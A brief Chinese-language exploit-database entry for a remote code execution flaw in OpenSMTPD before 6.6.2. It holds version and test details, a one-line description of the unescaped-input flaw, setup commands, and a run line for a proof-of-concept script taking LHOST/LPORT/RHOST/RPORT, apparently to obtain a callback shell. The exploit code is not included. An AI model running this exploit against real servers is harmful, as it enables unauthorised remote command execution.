漏洞名称:OpenSMTPD 6.6.2 - 远程代码执行
发布日期:2020-01-29
漏洞作者:1F98D
原始作者:Qualys Security Advisory
厂商主页:https://www.opensmtpd.org/
软件链接:https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
版本:OpenSMTPD < 6.6.2
测试环境:OpenBSD 6.6, OpenBSD 6.5, OpenBSD 6.4, OpenBSD 5.9
OpenSMTPD 在提交 a8e222352f 之后、版本 6.6.2 之前,未能充分转义用户可控输入中的危险字符。攻击者可以利用此漏洞在目标系统上执行任意 shell 命令。
sudo apt install python3-pip
pip3 install --user pwn
python3 poc1.py LHOST LPORT RHOST RPORT
https://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html